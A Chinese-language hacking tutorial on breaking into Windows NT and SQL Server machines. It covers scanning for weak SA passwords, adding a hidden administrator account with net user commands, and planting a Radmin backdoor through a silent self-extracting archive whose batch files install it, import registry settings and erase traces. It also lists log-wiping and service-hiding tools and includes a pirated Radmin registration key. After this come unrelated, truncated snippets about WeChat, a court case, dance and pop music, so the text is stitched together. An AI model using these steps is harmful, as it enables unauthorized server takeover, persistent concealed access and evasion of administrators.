工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
*** RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4、编写一个批处理,并命名为u.bat;
@echo offnet stop r_server
5、写第二个批处理,r.bat,内容为:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar *** 成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏 覆盖方式:覆盖所有文件
最近腾讯内侧上线了视频号功能,年前就开始关注了,但因为本身精力有限,并没有去申请,以至于现在现在想申请了也没有入口了,因为平台暂停了申请入口,这有点对标短视频行业的意思,基于微信庞大的用户量,相信一旦...
10月30日,江西省高级人民法院向赔偿请求人张玉环支付赔偿金。10月30日晚,张玉环向媒体表示,准备拿出五六万,适当弥补一下前妻宋小女。10月31日,宋小女得知此事后表示,她听到这个消息特别高兴,...
国际标准舞简称国标舞,分为拉丁舞和摩登舞两大类,即国标拉丁舞和国标摩登舞,其中国标拉丁舞又分为五个舞种,包括:伦巴、恰恰、桑巴、牛仔、斗牛;国标摩登舞也分为五个舞种,包括:华尔兹、狐步舞、快步舞、...
本文导读目录: 1、关于黑客常用术语 2、请问新手学黑客攻防要记哪些命令? 3、电影中的黑客几乎不会用到鼠标,只用键盘就可以完成一切,这是为什么? 4、当黑客要懂得哪些主要的CMD命令?...
男人和女人最担忧只不过便是“友情以上,恋人未满”遭受最好的朋友的忽然表白,通常是最终连盆友都做不了,也有些人确信男人和女人有纯友谊,被最好的朋友表白该怎么办?下边我产生详细介绍。 被最好的朋友表...
12月15日,超人气青春男团S.K.Y天空少年重磅登陆《酷狗首唱会》,带来同名EP的全新作品惊艳首秀,同时还透过酷狗“Idol宠爱计划”强力释放宠粉光波,陪伴广大粉丝共同度过一场冬日狂欢派对。WING...